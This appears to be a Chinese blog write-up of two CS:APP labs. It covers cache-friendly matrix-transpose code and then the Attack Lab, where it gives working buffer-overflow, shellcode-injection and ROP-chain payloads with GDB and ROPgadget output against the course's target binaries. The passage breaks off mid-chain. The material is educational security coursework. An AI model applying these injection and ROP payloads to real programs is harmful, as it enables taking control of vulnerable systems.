第9轮 A[0] [8] 和 B[8] [0],A[0] [9] 和 B[9] [0],A[0] [10] 和 B[10] [0] …… A[0] [15] 和 B[15] [0]

组(时间顺序) 元素
第1个 (第1轮) (大1轮) A [0] [0] ~ A [0] [7]
第2个 B [0] [0] ~ B [0] [7]
第3个 B [1] [0] ~ B [1] [7]
…… ……
第8个 B [6] [0] ~ B [6] [7]
第9个 B [7] [0] ~ B [7] [7]
第10个 (第2轮) A [1] [0] ~ A [1] [7]
第11个 (第3轮) A [2] [0] ~ A [2] [7]
第12个 (第4轮) A [3] [0] ~ A [3] [7]
…… ……
第16个 (第8轮) A [7] [0] ~ A [7] [7]
第17个 (第9轮) (大2轮) A [0] [8] ~ A [0] [15]
第18个 B [8] [0] ~ B [8] [7]
第19个 B [9] [0] ~ B [9] [7]
…… ……

从第二轮开始,后续几轮所需要的 B数组 的值,都可以在 第2~9个 cache 中获取

写出代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
void transpose_submit(int M, int N, int A[N][M], int B[M][N])
{
if (M == 32 && N == 32)
{
int i, j, m, n;
for (i = 0; i < N; i += 8)
for (j = 0; j < M; j += 8)
for (m = i; m < i + 8; ++m)
for (n = j; n < j + 8; ++n)
{
B[n][m] = A[m][n];
}
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
➜  [/home/ywhkkx/cachelab-handout] ./test-trans -M 32 -N 32

Function 0 (2 total)
Step 1: Validating and generating memory traces
Step 2: Evaluating performance (s=5, E=1, b=5)
func 0 (Transpose submission): hits:1710, misses:343, evictions:311

Function 1 (2 total)
Step 1: Validating and generating memory traces
Step 2: Evaluating performance (s=5, E=1, b=5)
func 1 (Simple row-wise scan transpose): hits:870, misses:1183, evictions:1151

Summary for official submission (func 0): correctness=1 misses=343

TEST_TRANS_RESULTS=1:343

发现 miss 在 300 以上,还不是满分

理论上是可以到达满分的,但是上述操作是在没有考虑“两个块映射到同一个组”的前提下进行的,那么两个块可能映射到同一个组中吗?

我们有32个组,每个组有32字节:

1
2
In [1]: 32*32
Out[1]: 1024

在每个 8 * 8 的小矩阵中,每个单元4字节,同一时期只需要同时映射2个小矩阵

1
2
In [2]: 8*8*2*4
Out[2]: 512

理论上来说Cache可以存储的字节数 远大于 两个小矩阵所需要的字节数,Cache没有必要把两个块映射到同一个组中

但是Cache会以整个 32 * 32 的空间进行映射,为了让 32 个组可以覆盖这个空间,Cache只能让多个数据块映射到同一个组中,一但映射完成,“Cache的各个组”和“各个空间位置”的对应关系就固定了

比如:数组A和数组B中,对应位置的块就会被分配到同一个组中,当进行 对角线的引用 时,一定会发生缓存的冲突不命中,并且,由于A和B的元素时一个一个处理的,必定会造成反复多次的冲突不命中(A第一个元素读miss,B第一个元素存miss,A读第二个元素miss)

解决方法:通过变量一次性读出A的一整行,再存入B

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
if (M == 32 && N == 32)
{
int i, j, k, v1, v2, v3, v4, v5, v6, v7, v8;
for (i = 0; i < 32; i += 8)
for (j = 0; j < 32; j += 8)
for (k = i; k < (i + 8); ++k)
{
v1 = A[k][j];
v2 = A[k][j + 1];
v3 = A[k][j + 2];
v4 = A[k][j + 3];
v5 = A[k][j + 4];
v6 = A[k][j + 5];
v7 = A[k][j + 6];
v8 = A[k][j + 7];
B[j][k] = v1;
B[j + 1][k] = v2;
B[j + 2][k] = v3;
B[j + 3][k] = v4;
B[j + 4][k] = v5;
B[j + 5][k] = v6;
B[j + 6][k] = v7;
B[j + 7][k] = v8;
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
➜  [/home/ywhkkx/cachelab-handout] ./test-trans -M 32 -N 32

Function 0 (2 total)
Step 1: Validating and generating memory traces
Step 2: Evaluating performance (s=5, E=1, b=5)
func 0 (Transpose submission): hits:1766, misses:287, evictions:255

Function 1 (2 total)
Step 1: Validating and generating memory traces
Step 2: Evaluating performance (s=5, E=1, b=5)
func 1 (Simple row-wise scan transpose): hits:870, misses:1183, evictions:1151

Summary for official submission (func 0): correctness=1 misses=287

TEST_TRANS_RESULTS=1:287

64 * 64

这里同样使用分块技术进行优化,需要注意的是,当矩阵大小变为 64x64 时,矩阵中的每一行需要8 个高速缓存行进行保存,所以我们只能设置块大小为 4

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
else if (M == 64 && N == 64)
{
int l, k, i, j;
int a0, a1, a2, a3, a4, a5, a6, a7;
for (i = 0; i < N; i += 8) {
for (j = 0; j < M; j += 8) {
for (k = i; k < i + 4; k++) {
a0 = A[k][j];
a1 = A[k][j + 1];
a2 = A[k][j + 2];
a3 = A[k][j + 3];
a4 = A[k][j + 4];
a5 = A[k][j + 5];
a6 = A[k][j + 6];
a7 = A[k][j + 7];

B[j][k] = a0;
B[j + 1][k] = a1;
B[j + 2][k] = a2;
B[j + 3][k] = a3;

B[j][k + 4] = a4;
B[j + 1][k + 4] = a5;
B[j + 2][k + 4] = a6;
B[j + 3][k + 4] = a7;
}
for (l = j + 4; l < j + 8; l++) {

a4 = A[i + 4][l - 4]; // A left-down col
a5 = A[i + 5][l - 4];
a6 = A[i + 6][l - 4];
a7 = A[i + 7][l - 4];

a0 = B[l - 4][i + 4]; // B right-above line
a1 = B[l - 4][i + 5];
a2 = B[l - 4][i + 6];
a3 = B[l - 4][i + 7];

B[l - 4][i + 4] = a4; // set B right-above line
B[l - 4][i + 5] = a5;
B[l - 4][i + 6] = a6;
B[l - 4][i + 7] = a7;

B[l][i] = a0; // set B left-down col
B[l][i + 1] = a1;
B[l][i + 2] = a2;
B[l][i + 3] = a3;

B[l][i + 4] = A[i + 4][l];
B[l][i + 5] = A[i + 5][l];
B[l][i + 6] = A[i + 6][l];
B[l][i + 7] = A[i + 7][l];
}
}
}
}

​ // 讲真我这里看不懂,先挂着以后慢慢看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
➜  [/home/ywhkkx/cachelab-handout] ./test-trans -M 64 -N 64

Function 0 (2 total)
Step 1: Validating and generating memory traces
Step 2: Evaluating performance (s=5, E=1, b=5)
func 0 (Transpose submission): hits:9074, misses:1171, evictions:1139

Function 1 (2 total)
Step 1: Validating and generating memory traces
Step 2: Evaluating performance (s=5, E=1, b=5)
func 1 (Simple row-wise scan transpose): hits:3474, misses:4723, evictions:4691

Summary for official submission (func 0): correctness=1 misses=1171

TEST_TRANS_RESULTS=1:1171

61 * 67

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
else if (M == 61)
{
int i, j, v1, v2, v3, v4, v5, v6, v7, v8;
int n = N / 8 * 8;
int m = M / 8 * 8;
for (j = 0; j < m; j += 8)
for (i = 0; i < n; ++i)
{
v1 = A[i][j];
v2 = A[i][j + 1];
v3 = A[i][j + 2];
v4 = A[i][j + 3];
v5 = A[i][j + 4];
v6 = A[i][j + 5];
v7 = A[i][j + 6];
v8 = A[i][j + 7];

B[j][i] = v1;
B[j + 1][i] = v2;
B[j + 2][i] = v3;
B[j + 3][i] = v4;
B[j + 4][i] = v5;
B[j + 5][i] = v6;
B[j + 6][i] = v7;
B[j + 7][i] = v8;
}
for (i = n; i < N; ++i)
for (j = m; j < M; ++j)
{
v1 = A[i][j];
B[j][i] = v1;
}
for (i = 0; i < N; ++i)
for (j = m; j < M; ++j)
{
v1 = A[i][j];
B[j][i] = v1;
}
for (i = n; i < N; ++i)
for (j = 0; j < M; ++j)
{
v1 = A[i][j];
B[j][i] = v1;
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
➜  [/home/ywhkkx/cachelab-handout] ./test-trans -M 61 -N 67

Function 0 (2 total)
Step 1: Validating and generating memory traces
Step 2: Evaluating performance (s=5, E=1, b=5)
func 0 (Transpose submission): hits:6334, misses:1905, evictions:1873

Function 1 (2 total)
Step 1: Validating and generating memory traces
Step 2: Evaluating performance (s=5, E=1, b=5)
func 1 (Simple row-wise scan transpose): hits:3756, misses:4423, evictions:4391

Summary for official submission (func 0): correctness=1 misses=1905

TEST_TRANS_RESULTS=1:1905

整体打分

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
➜  [/home/ywhkkx/cachelab-handout] ./driver.py             
Part A: Testing cache simulator
Running ./test-csim
Your simulator Reference simulator
Points (s,E,b) Hits Misses Evicts Hits Misses Evicts
3 (1,1,1) 9 8 6 9 8 6 traces/yi2.trace
3 (4,2,4) 4 5 2 4 5 2 traces/yi.trace
3 (2,1,4) 2 3 1 2 3 1 traces/dave.trace
3 (2,1,3) 167 71 67 167 71 67 traces/trans.trace
3 (2,2,3) 201 37 29 201 37 29 traces/trans.trace
3 (2,4,3) 212 26 10 212 26 10 traces/trans.trace
3 (5,1,5) 231 7 0 231 7 0 traces/trans.trace
6 (5,1,5) 265189 21775 21743 265189 21775 21743 traces/long.trace
27


Part B: Testing transpose function
Running ./test-trans -M 32 -N 32
Running ./test-trans -M 64 -N 64
Running ./test-trans -M 61 -N 67

Cache Lab summary:
Points Max pts Misses
Csim correctness 27.0 27
Trans perf 32x32 8.0 8 287
Trans perf 64x64 8.0 8 1171
Trans perf 61x67 10.0 10 1905
Total points 53.0 53

这个 Lab 真的做吐了……

Attack Lab

该任务涉及对两个具有不同安全漏洞的程序总共发起五次攻击,您将从本实验室获得的成果包括:

  • 您将了解攻击者在程序不存在漏洞时利用安全漏洞的不同方式充分保护自己,防止缓冲区溢出
  • 通过本课程,您将更好地了解如何编写更安全的程序,如以及编译器和操作系统提供的一些功能,以提高程序的安全性
  • 您将更深入地了解 x86-64 的堆栈和参数传递机制机器代码
  • 您将更深入地了解 x86-64 指令的编码方式
  • 您将获得更多使用 GDB 和 OBJDUMP 等调试工具的经验

实验说明

实验文件介绍:

  • ctarget:易受 代码注入 攻击的可执行程序
  • rtarget:易受 面向返回 编程攻击的可执行程序
  • cookie.txt:一个8位十六进制代码,在攻击中用作唯一标识符
  • farm.c:目标公司的“gadget farm”的源代码,用于生成ROP链
  • hex2raw:一个生成攻击字符串的工具,将16进制数转化为攻击字符,因为有些字符在屏幕上面无法输入,所以输入该字符的16进制数,自动转化为该字符

实验要求:

  • 你必须在与目标的机器相似的机器上完成任务
  • 您的解决方案可能不会使用攻击绕过程序中的验证代码,明确地任何包含在攻击字符串中供ret指令使用的地址都应该是以下目的地:
    • 函数 touch1,touch2 或 touch3 的地址
    • 注入代码的地址
    • gadget farm 中一个 gadget 的地址
  • 您只能从文件 rtarget 构建 gadget,其地址介于函数 start_farm 和 end_farm 的地址之间

缓冲区溢出

C语言对于数组引用不进行任何的边界检查,并且局部变量和状态信息都保存在栈中,对越界的数组元素进行写操作,会破坏存储在栈中的状态信息(覆盖 ret 原本应该执行的返回地址),当寄存器执行 ret 指令时就会出现严重的错误

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#include <stdio.h>
#include <stdlib.h>

void explosion(){
printf("!!!You touch the explosion");
exit(0);
}

/* Implementation of library function gets() */
char *custom_gets(char *s){
int c;
char *dest = s;
while((c = getchar()) != '\n' && c != EOF)
*dest++ = c;
if(c == EOF && dest == s)
/* No characters read */
return NULL;
*dest++ = '\0'; /* Terminate string */
return s;
}

/** Read input line and write it back */
void echo(){
char buf[8];
custom_gets(buf);
puts(buf);
}

int main(int argc, char* argv[]){
echo();
return 0;
}

使用如下命令可以从c源文件生成汇编代码:

1
linux> gcc -fno-asynchronous-unwind-tables -fno-stack-protector -O1 -S test.c
  • -fno-asynchronous-unwind-tables 选项是用来不生成CFI指令
  • -fno-stack-protector 选项阻止进行栈破坏检测,默认是允许使用栈保护
  • -O1 不做任何优化处理
  • -S 生成汇编代码即结束
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
echo:
endbr64
pushq %rbx
subq $16, %rsp // 该程序在栈上为字符数组分配了16个字节
leaq 8(%rsp), %rbx // 数组首地址被装入rbx中
movq %rbx, %rdi // 数组首地址被装入rdi中(第一个参数的位置)
call custom_gets
movq %rbx, %rdi // 数组首地址被装入rdi中(第一个参数的位置)
call puts@PLT
addq $16, %rsp // 回收栈空间
popq %rbx
ret
.size echo, .-echo
.globl main
.type main, @function

使用如下命令可以从c源文件生成二进制代码:

1
linux> gcc -fno-stack-protector -g test.c -o test
  • -g 方便GDB调试
1
2
3
4
5
6
pwndbg> stack
00:0000│ rsp 0x7fffffffdd50 —▸ 0x7ffff7fb3fc8 (__exit_funcs_lock) ◂— 0x0
01:0008│ rax rdx-5 0x7fffffffdd58 ◂— 0x550061616161 /* 'aaaa' */
02:0010│ rbp 0x7fffffffdd60 —▸ 0x7fffffffdd80 ◂— 0x0
03:00180x7fffffffdd68 —▸ 0x55555555527b (main+29) ◂— mov eax, 0
04:00200x7fffffffdd70 —▸ 0x7fffffffde78 —▸ 0x7fffffffe1de ◂— 0x77792f656d6f682f ('/home/yw')

发现返回地址很容易覆盖

代码注入攻击

touch1

1
2
3
4
5
6
7
8
9
ctarget: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=c7b4ed7d7d986fd5b8ec8742e9c6da371ba6a504, with debug_info, not stripped

[*] '/home/ywhkkx/attacklab-target1/ctarget'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
FORTIFY: Enabled
1
2
3
➜  [/home/ywhkkx/attacklab-target1] ./ctarget -q  
Cookie: 0x59b997fa
Type string:

跟踪字符串定位到第一个输入:

对输入函数进行反汇编:

1
2
3
4
5
6
7
8
.text:00000000004017A8 ; __unwind {
.text:00000000004017A8 sub rsp, 28h
.text:00000000004017AC mov rdi, rsp ; dest
.text:00000000004017AF call Gets
.text:00000000004017B4 mov eax, 1
.text:00000000004017B9 add rsp, 28h
.text:00000000004017BD retn
.text:00000000004017BD ; } // starts at 4017A8

通过“ sub rsp, 28h ”可以发现:它为数组“buf”提供了“0x28”字节的空间

反编译“touch1”以获取它的地址:( 0x00000000004017C0 )

1
2
3
4
5
6
7
8
9
10
11
12
13
14
.text:00000000004017C0 ; void __cdecl touch1()
.text:00000000004017C0 public touch1
.text:00000000004017C0 touch1 proc near
.text:00000000004017C0 ; __unwind {
.text:00000000004017C0 sub rsp, 8
.text:00000000004017C4 mov cs:vlevel, 1
.text:00000000004017CE mov edi, offset aTouch1YouCalle ; "Touch1!: You called touch1()"
.text:00000000004017D3 call _puts
.text:00000000004017D8 mov edi, 1 ; level
.text:00000000004017DD call validate
.text:00000000004017E2 mov edi, 0 ; status
.text:00000000004017E7 call _exit
.text:00000000004017E7 ; } // starts at 4017C0
.text:00000000004017E7 touch1 endp

写payload调用“touch1”:

1
2
3
4
5
6
00 00 00 00 00 00 00 00 // 先填充0x28字节的"\x00"
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
c0 17 40 00 00 00 00 00 // 小端序的"0x00000000004017C0"
1
2
3
4
5
6
7
8
9
➜  [/home/ywhkkx/attacklab-target1] ./hex2raw -i solutions/level1.txt | ./ctarget -q 
Cookie: 0x59b997fa
Type string:Touch1!: You called touch1()
Valid solution for level 1 with target ctarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:ctarget:1:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C0 17 40 00 00 00 00 00

touch2

反汇编获取 touch2 的地址为:0x00000000004017EC

故技重施:

1
2
3
4
5
6
7
8
➜  [/home/ywhkkx/attacklab-target1] ./hex2raw -i solutions/level2.txt | ./ctarget -q 
Cookie: 0x59b997fa
Type string:Misfire: You called touch2(0xee55f980)
FAIL: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:FAIL:0xffffffff:ctarget:2:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 EC 17 40 00 00 00 00 00

发现不通过,只好先看看 touch2 代码了:

这段程序就是验证传进来的参数val是否和cookie中值相等(实验给出的cookie为:0x59b997fa)

这时候就好注入代码了:(接下来的调试请用原本GDB)

1
2
3
4
/** inject.s */
movq $0x59b997fa, %rdi
pushq 0x4017ec
ret
1
2
3
4
5
6
7
8
9
10
11
12
➜  [/home/ywhkkx/attacklab-target1/solutions] gcc -c inject.s
➜ [/home/ywhkkx/attacklab-target1/solutions] objdump -d inject.o

inject.o: 文件格式 elf64-x86-64


Disassembly of section .text:

0000000000000000 <.text>:
0: 48 c7 c7 fa 97 b9 59 mov $0x59b997fa,%rdi
7: ff 34 25 ec 17 40 00 pushq 0x4017ec
e: c3 retq

思路很简单,执行这串代码,就可以把cookie赋值给第一个参数,利用程序原本的 ret 可以控制 IP 到 rsp ,代码会把 touch2 的地址压栈并用 ret 执行

接下来用GDB获取执行这串代码时,rsp 的地址:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
(gdb) break getbuf // 打断点
Breakpoint 1 at 0x4017a8: file buf.c, line 12.
(gdb) run -q // 不加"-q"可能会报错
Starting program: /home/ywhkkx/attacklab-target1/ctarget -q
Cookie: 0x59b997fa

Breakpoint 1, getbuf () at buf.c:12
12 buf.c: 没有那个文件或目录.
(gdb) disas // 反汇编
Dump of assembler code for function getbuf:
=> 0x00000000004017a8 <+0>: sub $0x28,%rsp
0x00000000004017ac <+4>: mov %rsp,%rdi
0x00000000004017af <+7>: callq 0x401a40 <Gets>
0x00000000004017b4 <+12>: mov $0x1,%eax
0x00000000004017b9 <+17>: add $0x28,%rsp
0x00000000004017bd <+21>: retq
End of assembler dump.
(gdb) info r rsp // 打印rsp
rsp 0x5561dca0 0x5561dca0

结合 rsp 的地址,手写注入代码:

1
2
3
4
5
6
48 c7 c7 fa 97 b9 59 68 
ec 17 40 00 c3 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00
1
2
3
4
5
6
7
8
9
➜  [/home/ywhkkx/attacklab-target1] ./hex2raw -i solutions/level2.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target ctarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:ctarget:2:48 C7 C7 FA 97 B9 59 68 EC 17 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00

touch3

出现了一个函数:

“sprintf”对 cookie 进行了操作,把它变为了16进制形式的字符串

1
2
cookie: 59b997fa
-> 35 39 62 39 39 37 66 61

思路就是:把字符串提前放入某个地址,把那个地址赋值给 rdi 就可以了

现在先考虑把字符串放在哪里

s的位置是随机的,所以之前留在getbuf中的数据,则有可能被hexmatch所重写,所以放在getbuf中并不安全。为了安全起见,我们把字符串放在getbuf的父栈帧中,也就是test栈帧中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
(gdb) b* 0x401968 // 在test处打断点
Breakpoint 1 at 0x401968: file visible.c, line 90.
(gdb) run -q
Starting program: /home/ywhkkx/attacklab-target1/ctarget -q
Cookie: 0x59b997fa

Breakpoint 1, test () at visible.c:90
90 visible.c: 没有那个文件或目录.
(gdb) disas
Dump of assembler code for function test:
=> 0x0000000000401968 <+0>: sub $0x8,%rsp
0x000000000040196c <+4>: mov $0x0,%eax
0x0000000000401971 <+9>: callq 0x4017a8 <getbuf>
0x0000000000401976 <+14>: mov %eax,%edx
0x0000000000401978 <+16>: mov $0x403188,%esi
0x000000000040197d <+21>: mov $0x1,%edi
0x0000000000401982 <+26>: mov $0x0,%eax
0x0000000000401987 <+31>: callq 0x400df0 <__printf_chk@plt>
0x000000000040198c <+36>: add $0x8,%rsp
0x0000000000401990 <+40>: retq
End of assembler dump.
(gdb) info r rsp
rsp 0x5561dcb0 0x5561dcb0

写入字符串的目标地址:0x5561dcb0 - 0x8

1
2
3
4
/** inject.s */  
movq $0x5561dca8, %rdi
pushq 0x4018fa
ret
1
2
3
4
5
6
7
8
9
10
11
12
➜  [/home/ywhkkx/attacklab-target1/solutions] gcc -c inject.s    
➜ [/home/ywhkkx/attacklab-target1/solutions] objdump -d inject.o

inject.o: 文件格式 elf64-x86-64


Disassembly of section .text:

0000000000000000 <.text>:
0: 48 c7 c7 a8 dc 61 55 mov $0x5561dca8,%rdi
7: ff 34 25 fa 18 40 00 pushq 0x4018fa
e: c3 retq

手写注入代码:

1
2
3
4
5
6
7
48 c7 c7 a8 dc 61 55 68 // 注入代码
fa 18 40 00 c3 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00
35 39 62 39 39 37 66 61 // cookie
1
2
3
4
5
6
7
8
9
➜  [/home/ywhkkx/attacklab-target1] ./hex2raw -i solutions/level3.txt | ./ctarget -q 
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target ctarget
PASS: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:PASS:0xffffffff:ctarget:3:48 C7 C7 A8 DC 61 55 68 FA 18 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00 35 39 62 39 39 37 66 61

ROP攻击

缓冲区溢出攻击的普遍发生给计算机系统造成了许多麻烦,现代的编译器和操作系统实现了许多机制,以避免遭受这样的攻击,限制入侵者通过缓冲区溢出攻击获得系统控制的方式

  • 栈随机化(PIE)
  • 栈破坏检测(canary)
  • 限制可执行代码区域(NX)
1
2
3
4
void setval_210(unsigned *p)
{
*p = 3347663060U;
}
1
2
3
0000000000400f15 <setval_210>:
400f15: c7 07 d4 48 89 c7 movl $0xc78948d4,(%rdi)
400f1b: c3 retq

可以使用 ret 把 IP 控制在 “0x400f18”(0x48,movq)处,控制完 rdi 后就 ret 下一个地址

这样穿起来的ROP操作就被称为ROP链

touch2 ROP

为了控制 touch2 ,我们需要把 cookie 放入 rdi 寄存器

在“farm.c”中存放有我们需要的 gadget ,这里采用 ROPgadget 工具来获取 gadget

目标:“mov xxx rdi”,“pop xxx rdi”(以下这种汇编方式和之前使用的不同)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
➜  [/home/ywhkkx/attacklab-target1] ROPgadget --binary ./rtarget --only "mov|ret"
Gadgets information
============================================================
0x0000000000401b23 : mov byte ptr [rax + 0x605500], 0 ; ret
0x0000000000400f63 : mov byte ptr [rip + 0x20454e], 1 ; ret
0x000000000040214e : mov dword ptr [rdi + 8], eax ; ret
0x00000000004019e1 : mov dword ptr [rdi], 0x9090d199 ; ret
0x00000000004019c3 : mov dword ptr [rdi], 0x90c78948 ; ret
0x0000000000401aab : mov dword ptr [rdi], 0x90e08948 ; ret
0x0000000000401a5a : mov dword ptr [rdi], 0x91e08948 ; ret
0x00000000004019b5 : mov dword ptr [rdi], 0x9258c254 ; ret
0x00000000004019fc : mov dword ptr [rdi], 0xc084d181 ; ret
0x0000000000401a97 : mov dword ptr [rdi], 0xc2e08948 ; ret
0x0000000000401a6e : mov dword ptr [rdi], 0xc391d189 ; ret
0x00000000004019bc : mov dword ptr [rdi], 0xc78d4863 ; ret
0x00000000004019ae : mov dword ptr [rdi], 0xc7c78948 ; ret
0x0000000000401a0a : mov dword ptr [rdi], 0xc908c288 ; ret
0x0000000000401a7c : mov dword ptr [rdi], 0xc908ce09 ; ret
0x0000000000401a75 : mov dword ptr [rdi], 0xd238c281 ; ret
0x0000000000401a2c : mov dword ptr [rdi], 0xdb08ce81 ; ret
0x0000000000401b10 : mov dword ptr [rip + 0x2045ee], eax ; ret
0x0000000000402dd7 : mov eax, 0 ; ret
0x000000000040199a : mov eax, 0x909078fb ; ret
0x00000000004019db : mov eax, 0x90c2895c ; ret
0x0000000000401a91 : mov eax, 0xc020ce88 ; ret
0x00000000004019f6 : mov eax, 0xc048d189 ; ret
0x0000000000401a18 : mov eax, 0xc1e08948 ; ret
0x00000000004019ca : mov eax, 0xc3905829 ; ret
0x0000000000401a33 : mov eax, 0xc938d189 ; ret
0x0000000000401a54 : mov eax, 0xc9c4c289 ; ret
0x0000000000401a4e : mov eax, 0xd208d199 ; ret
0x0000000000401aa5 : mov eax, 0xd220ce8d ; ret
0x0000000000401a68 : mov eax, 0xdb08d189 ; ret
0x0000000000401994 : mov eax, 1 ; ret
0x0000000000401a07 : mov eax, esp ; ret
0x0000000000401a9a : mov eax, esp ; ret 0x8dc3
0x00000000004019b2 : mov edi, 0x5407c7c3 ; ret 0x9258
0x00000000004019a3 : mov edi, eax ; ret // target
0x000000000040214d : mov qword ptr [rdi + 8], rax ; ret
0x0000000000401a06 : mov rax, rsp ; ret
0x0000000000401a99 : mov rax, rsp ; ret 0x8dc3
0x00000000004019a2 : mov rdi, rax ; ret
0x0000000000400c55 : ret
0x0000000000403fbc : ret 0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
➜  [/home/ywhkkx/attacklab-target1] ROPgadget --binary ./rtarget --only "pop|ret"
Gadgets information
============================================================
0x0000000000402b12 : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040137e : pop r12 ; pop r13 ; pop r14 ; ret
0x00000000004021d7 : pop r12 ; pop r13 ; ret
0x00000000004018f7 : pop r12 ; ret
0x0000000000402b14 : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000401380 : pop r13 ; pop r14 ; ret
0x00000000004021d9 : pop r13 ; ret
0x0000000000402b16 : pop r14 ; pop r15 ; ret
0x0000000000401382 : pop r14 ; ret
0x0000000000402b18 : pop r15 ; ret
0x0000000000402b11 : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040137d : pop rbp ; pop r12 ; pop r13 ; pop r14 ; ret
0x00000000004021d6 : pop rbp ; pop r12 ; pop r13 ; ret
0x00000000004018f6 : pop rbp ; pop r12 ; ret
0x0000000000402b15 : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000401381 : pop rbp ; pop r14 ; ret
0x0000000000400ef5 : pop rbp ; ret
0x000000000040137c : pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; ret
0x00000000004021d5 : pop rbx ; pop rbp ; pop r12 ; pop r13 ; ret
0x00000000004018f5 : pop rbx ; pop rbp ; pop r12 ; ret
0x00000000004011aa : pop rbx ; pop rbp ; ret
0x0000000000401dab : pop rbx ; ret
0x000000000040141b : pop rdi ; ret // target
0x0000000000402b17 : pop rsi ; pop r15 ; ret
0x0000000000401383 : pop rsi ; ret

发现直接有 “ pop rdi ”,就使用它了(地址0x000000000040141b)

1
2
3
4
5
6
7
8
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
1b 14 40 00 00 00 00 00 // pop rdi
fa 97 b9 59 00 00 00 00 // cookie
ec 17 40 00 00 00 00 00
1
2
3
4
5
6
7
8
9
10
11
➜  [/home/ywhkkx/attacklab-target1] ./hex2raw -i solutions/level2ROP.txt | ./rtarget -q 
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target rtarget
Ouch!: You caused a segmentation fault!
Better luck next time
FAIL: Would have posted the following:
user id bovik
course 15213-f15
lab attacklab
result 1:FAIL:0xffffffff:rtarget:0:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1B 14 40 00 00 00 00 00 FA 97 B9 59 00 00 00 00 EC 17 40 00 00 00 00 00

touch3 ROP

和 touch3 相同,因为 cookie 是字符串,所以不能直接传参 rdi ,只能通过写入固定地址的方式间接传参

大体思路:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
0x401a06:
mov %rsp, %rax // 控制栈顶进入rax
retq
0x4019a2:
mov %rax, %rdi // 把rax装入rdi
retq
0x4019cc:
pop %rax // pop到rax
retq
0x4019dd:
mov %eax, %edx // 移动eax到edx
retq
0x401a70:
mov %edx, %ecx // 移动edx到ecx
retq
0x401a13:
mov %ecx, %esi // 移动ecx到esi
retq
0x4019d6:
lea (%rdi,%rsi,1),%rax // rdi和rsi相加进入rax
retq
0x4019a2:
mov %rax, %rdi // 把rax装入rdi
retq
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
06 1a 40 00 00 00 00 00 // mov %rsp, %rax
a2 19 40 00 00 00 00 00 // mov %rax, %rdi
cc 19 40 00 00 00 00 00 // pop %rax
48 00 00 00 00 00 00 00 // 偏移
dd 19 40 00 00 00 00 00 // mov %eax, %edx
70 1a 40 00 00 00 00 00 // mov %edx, %ecx
